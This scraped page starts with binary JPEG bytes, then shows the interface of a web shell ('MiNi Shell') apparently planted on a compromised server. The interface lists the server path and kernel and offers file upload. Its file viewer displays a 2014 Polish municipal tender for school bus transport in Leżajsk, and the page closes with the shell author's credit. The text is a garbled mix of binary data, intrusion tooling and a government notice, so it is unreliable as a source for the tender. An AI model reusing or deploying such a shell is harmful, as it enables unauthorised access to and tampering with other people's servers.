JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140729/163923-N-2014.html

<p class="kh_header"><b>Leżajsk: Dowóz uczniów do szkół na terenie Gminy Leżajsk 
w roku szkolnym 2014/2015</b><br>
<b>Numer ogłoszenia: 163923 - 2014; data zamieszczenia: 29.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Leżajsk , ul. Opalińskiego 2, 37-300 Leżajsk, woj. podkarpackie, tel. 017 240 62 00, faks 017 240 62 48.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lezajsk.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do szkół na terenie Gminy Leżajsk 
w roku szkolnym 2014/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług dowozu wraz z zakupem biletów miesięcznych dla uczniów uprawnionych zgodnie z ustawą o systemie oświaty  dojeżdżających do szkół na terenie Gminy Leżajsk w roku szkolnym 2014/2015 w dni powszednie z wyłączeniem sobót, niedziel i świąt oraz innych dni ustawowo wolnych od pracy, a także przerw w realizacji zajęć dydaktyczno - wychowawczych, określonych na podstawie obowiązujących przepisów prawa ( w szczególności ferie zimowe i letnie, wiosenna i zimowa przerwa świąteczna ) z podziałem na następujące trasy:

Trasa nr 1
Dowóz  uczniów  do Szkoły Podstawowej  w Biedaczowie
Trasa przejazdu (  numer  i nazwa przystanków ): 
I       Giedlarowa II  - ( 6 uczniów )
II      Gwizdów (przy drodze) - ( 19 uczniów )
III    Gwizdów Podlas ( cmentarz )  - ( 1 uczeń )
IV    Gwizdów Podlas ( na polach )  - ( 8 uczniów )
V     Gwizdów Podlas   ( na górce )  -  ( 5 uczniów )
VI    Gwizdów Podlas ( pod Zakąciem )  - ( 2 uczniów )
VII   Biedaczów Olszyny - ( 7 uczniów )
VIII  Gwizdów Podkudłacz ( sołtys )  -  ( 5 uczniów )
IX     Gwizdów Podkudłacz ( stara szkoła) -  ( 4 uczniów ),
X       Biedaczów - szkoła ( plac szkolny )
  
Przewidywana liczba dowożonych dzieci na tej trasie wynosi około 57 uczniów. 
Dowóz dzieci będzie się odbywał na jedną godzinę i Wykonawca zobowiązany jest do zapewnienia określonych środków transportu z uwzględnieniem liczby dzieci.
Odwóz uczniów do domu 5 dni po 2 odwozy. 
Łączna ilość  kilometrów na usługę dziennie około 67 km. 

Trasa nr  2
Dowóz  uczniów do Zespołu Szkół w Giedlarowej 
Trasa przejazdu ( numer i  nazwa przystanków ): Przywóz uczniów do szkoły podzielony został na dwie trasy:
 1 )   Trasa A ( dwa przywozy: jeden na godzinę 8:00, a drugi na późniejszą godzinę)
IV   Gwizdów ( 7 uczniów )
III   Giedlarowa II -  ( 45 uczniów )
II Giedlarowa - Dworczyna  - ( 14 uczniów )
I Giedlarowa Szkoła
2 )   Trasa B ( jeden przywóz )
V     Gwizdów - Podlas ( cmentarz )  - ( 2 uczniów )
VI    Gwizdów  - Podlas  - (4 uczniów )
VII    Gwizdów - Podlas  I -  ( 2 uczeń )
VIII   Biedaczów Podkudłacz ( skrzyżowanie )-  ( 1 uczeń )
 IX     Biedaczów - szkoła  ( 20 uczniów )
IV      Gwizdów  - ( 10 uczniów )
 III     Giedlarowa II -  ( 27 uczniów )
II Giedarowa - Dworczyna - (2 uczniów)
I Giedlarowa Szkoła
Dowóz dzieci będzie się odbywał na różną godzinę i Wykonawca zobowiązany jest do zapewnienia określonych środków transportu z uwzględnieniem liczby dzieci.
Odwóz uczniów ze szkoły:
Trasa 1  ( nazwa przystanków ). Giedlarowa  - szkoła ,Giedlarowa - Dworczyna, Giedlarowa II, Gwizdów. Odwóz dwa razy dziennie o dwóch różnych godzinach.          
Trasa 2 ( nazwa przystanków ). Giedlarowa  - szkoła, Giedlarowa Dworczyna, Giedlarowa II, Gwizdów, Gwizdów Podlas (cmentarz), Gwizdów Podlas, Gwizdów Podlas I, Biedaczów - szkoła, Biedaczów -  Podkudłacz ( skrzyżowanie ). Odwóz dwa razy dziennie o dwóch różnych godzinach.          
Przewidywana liczba dowożonych dzieci na tej trasie wynosi około 134 uczniów. 
Łączna ilość  kilometrów dla usługi dziennej  około 72 km.

Trasa nr  3
Dowóz uczniów do Zespołu Szkół w Starym Mieście 
Trasa przejazdu (  numer i nazwa przystanków w  miejscowości Przychojec ): 
I    Przychojec - Łan   - ( 1 uczniów )
II   Przychojec - szkoła  - (  9  uczniów )
III  Przychojec - Górka  - ( 9 uczniów )
IV Stare Miasto - szkoła
Przewidywana liczba dowożonych dzieci na tej trasie wynosi około 19 uczniów.
Dowóz  i odwóz dzieci będzie się odbywał na jedną godzinę i Wykonawca zobowiązany jest do zapewnienia określonych środków transportu z uwzględnieniem liczby dzieci.
Łączna ilość  kilometrów na usługi dziennej  około 15 km.

Trasa nr  4
Dowóz  uczniów  do Zespołu Szkół w Piskorowicach
Trasa przejazdu (numer i  nazwa przystanków ): Przywóz uczniów do szkoły
I.	 Piskorowice Iglopol  - ( 6 uczniów )
II.	Paluchy - ( 6 uczniów )
III.	Piskorowice - Chałupki - Pastwisko - (12 uczniów)
IV.	Piskorowice Chałupki - (11 uczniów)
VIII. Piskorowice - Szkoła,
V.	 Rzuchów Osiedle - ( 7 uczniów )
VI.	Rzuchów-  przystanek  - ( 5 uczniów )
VIII.	Piskorowice - Szkoła,
VII.Piskorowice - Mołynie - ( 3 uczniów )
VIII. Piskorowice - Szkoła
      
Dowóz dzieci będzie się odbywał na jedną godzinę i Wykonawca zobowiązany jest do zapewnienia określonych środków transportu z uwzględnieniem liczby dzieci.
Odwóz uczniów ze szkoły: Odwóz dwa razy dziennie o dwóch różnych godzinach.               
Piskorowice - Chałupki - Pastwisko, Piskorowice - Chłupki, Paluchy, Piskorowice - Iglopol, Piskorowice Mołynie, Piskorowice Szkoła, Rzuchów Przystanek, Rzuchów Osiedle.
Przewidywana liczba dowożonych dzieci na tej trasie wynosi około 50 uczniów. 
Łączna ilość  kilometrów na usługi dziennej  około  75 km. 

Trasa nr  5
Dowóz  uczniów do Zespołu Szkół w Brzózie Królewskiej 
Trasa przejazdu (numer i  nazwa przystanków - cała trasa została podzielona na trasę oraz trasę A, B i C )
     Trasa A 
       I   .  Maleniska - Szkoła - (30 uczniów)
       II.     Maleniska - Iglopol,  (1 uczeń)
       III.      Hucisko (21 uczniów)
IX.	Brzóza Królewska - Szkoła
Trasa B
       IV.    Hucisko Siuzdaki - ( 14 uczniów )
       V.    Brzóza Królewska IV - (13 uczniów)
VIII.      Brzóza Królewska (Dom Pomocy Społecznej) -  (20 uczniów)
X.	Brzóza Królewska - Szkoła
Trasa C
       VI.    Brzóza Królewska (sołtys), - ( 30 uczniów )
       VII.    Brzóza Królewska ( P. G. Szczęch) - (22 uczniów)
VI.      Brzóza Królewska -  szkoła 

Dowóz: 
Trasa A: (Maleniska Szkoła - Maleniska Iglopol - Hucisko - Brzóza Królewska Szkoła) 
Dowóz: jeden na godzinę 8:00 i drugi na późniejszą godzinę. Przewidywana liczba dowożonych dzieci na tej trasie wynosi około 52 uczniów.
Trasa B i C  razem (Hucisko - Siuzdaki,    Brzóza Królewska IV, Brzóza Królewska (sołtys), Brzóza Królewska ( P. G. Szczęch), Brzóza Królewska (Dom Pomocy Społecznej), Brzóza Królewska -  szkoła )
Dowóz jeden na godzinę 8:00 i drugi na późniejszą godzinę. Przewidywana liczba dowożonych dzieci na tej trasie wynosi około 99 uczniów.
Wykonawca zobowiązany jest do zapewnienia określonych środków transportu z uwzględnieniem liczby dzieci.
Odwóz:
Trasa A ( Brzóza Królewska Szkoła - Hucisko - Maleniska Iglopol  -Maleniska Szkoła)
Odwóz dwa odwozy dziennie o różnych godzinach.
Trasa B i C  razem (Brzóza Królewska -  szkoła, Brzóza Królewska (Dom Pomocy Społecznej), Brzóza Królewska ( P. G. Szczęch), Brzóza Królewska (sołtys), Brzóza Królewska IV, Hucisko - Siuzdaki)
Odwóz dwa odwozy dziennie o różnych godzinach.
Łączna ilość  kilometrów na usługi dziennej  około  35 km.

Zamawiający nie dopuszcza składania ofert częściowych. Oferta powinna być złożona na wszystkie wyżej wskazane trasy. 


Wymagania dotyczące sposobu realizacji przedmiotu zamówienia:

1) Zamawiający zapewnia opiekę w czasie dowozu.
2) Trasa przejazdu może ulec zmianie.
3) W trakcie realizacji zamówienia liczba przewożonych dzieci może ulec zmianie                        (zwiększeniu/zmniejszeniu) poprzez stosowną informację przekazaną Wykonawcy 
z miesięcznym wyprzedzeniem przez Dyrektora szkoły, jednak cena zaoferowana za jeden bilet miesięczny jest niezmienna przez cały okres realizacji zadania. 
4) W przypadku odpracowywania zajęć szkolnych w innym dniu wolnym od zajęć, Wykonawca zobowiązany jest zapewnić przewóz dzieci zgodnie z rozkładem jazdy ustalonym przez Dyrektora Szkoły.
5) Dowozy i odwozy odbywać się będą w godzinach ustalonych przez dyrektora szkoły                 z Wykonawcą.
6) Dowóz uczniów odbywać się będzie na podstawie imiennych biletów miesięcznych.
7) Dyrektorzy szkół przekażą co miesiąc Wykonawcy szczegółowy wykaz uprawnionych uczniów. Wykonawca zobowiązany jest dostarczyć bilety do poszczególnych szkół                        w terminie do dnia pierwszego każdego miesiąca którego dowóz dotyczy na swój koszt.
8) Rozliczenia będą dokonywane w cyklu miesięcznym i na podstawie  zestawienia biletów miesięcznych dla poszczególnych uczniów potwierdzonych przez właściwego dyrektora szkoły i dostarczonych do Referatu Oświaty, Promocji, Kultury i Współpracy 
z Organizacjami Społecznymi. Wykonawca dostarcza prawidłowo wypełnioną fakturę do Urzędu Gminy w Leżajsku do 15 każdego miesiąca.
9) Dowozy i odwozy mają odbywać się pojazdami zapewniającymi miejsca siedzące dla wszystkich przewożonych uczniów.
10) Dowożenie uczniów będzie  się odbywać środkiem transportu w pełni sprawnym                          i posiadającym aktualne badanie techniczne. Kierowca oraz środek transportu, którym odbywać się będzie dowożenie dzieci powinien spełniać wszystkie wymogi określone                   w ustawie  z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym oraz przepisów wykonawczych do tej ustawy.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa                      w art. 67 ust. 1 pkt 6 uPzp stanowiących nie więcej niż 20 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 5 600,00 zł (słownie: pięć tysięcy sześćset złotych 00/100 zł).
Wadium należy wnieść w jednej lub kilku następujących formach przewidzianych w art. 45 ust. 6 uPzp, tj.:
2.	pieniądzu,
3.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
4.	gwarancjach bankowych,
5.	gwarancjach ubezpieczeniowych,
6.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 z późn. zm.).
Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. Wadium w pieniądzu należy przelać na konto Zamawiającego:

Bank Pekao SA I O. w Leżajsku nr 45 1240 2630 1111 0000 3637 1846

W przypadku wadium wnoszonego w pieniądzu za termin wpłynięcia wadium uznaje się termin jego wniesienia. Przez wniesienie rozumie się uznanie kwoty wadium przez rachunek Zamawiającego. Do oferty należy dołączyć dokument potwierdzający przelew (wniesienie) środków na rachunek Zamawiającego. Wadium wnoszone w pieniądzu powinno znajdować się fizycznie na koncie Zamawiającego przed terminem składania ofert.
W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu należy złożyć w osobnej kopercie opisanej Wadium - Dowóz uczniów do szkół na terenie Gminy Leżajsk w roku szkolnym 2014/2015 oraz włożyć do koperty zewnętrznej.
Wadium wniesione w formie innej niż pieniężna musi spełniać następujące wymagania:
- odpowiadać co do wartości wysokości wadium określonej w niniejszej SIWZ,
- musi odpowiadać co do terminu ważności terminowi związania ofertą określonemu w niniejszej SIWZ,
- zawierać w swej treści okoliczności (zgodnie z art. 46 ust. 4a i 5 uPzp) w których gwarant (poręczyciel) wypłaci kwotę wadium zamawiającemu, wraz z klauzulą mówiącą, że wypłata nastąpi na pierwsze żądanie zamawiającego bez protestu gwaranta (poręczyciela),
Zamawiający zwróci niezwłocznie wadium na zasadach określonych w art. 46 uPzp.
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe                  
z przyczyn leżących po stronie Wykonawcy. 
- jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 uPzp, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 uPzp lub pełnomocnictw, chyba że udowodni, że nie wynika to z przyczyn nie leżących po jego stronie.
Wykonawca lub podmiot wystawiający gwarancję bankową/ubezpieczeniową nie może uzależnić dokonania zapłaty od spełnienia jakichkolwiek dodatkowych warunków lub wykonania czynności (np.: przesłania wezwania za pośrednictwem banku prowadzącego rachunek ), jak również od przedłożenia dodatkowej dokumentacji, dodatkowych oświadczeń złożonych przez wykonawcę lub inny podmiot pod rygorem wykluczenia Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia tj.: Oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień             (wg załącznika nr 3  do siwz).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy 2) Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu 3) Pełnomocnictwo do występowania w imieniu Wykonawcy i zaciągania w jego imieniu zobowiązań. Musi być załączone w oryginale albo załączone jako kopia pełnomocnictwa uwierzytelniona notarialnie (	jeśli dotyczy).
4) Informacja o podwykonawcach (jeśli dotyczy).
5) Pisemne zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (jeśli dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lezajsk.ug.gov.pl (BIP)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Leżajsku ul. Opalińskiego 2, 37-300 Leżajsk (pok. 42).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2014 godzina 10:00, miejsce: Urząd Gminy w Leżajsku ul. Opalińskiego 2,                  37-300 Leżajsk (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com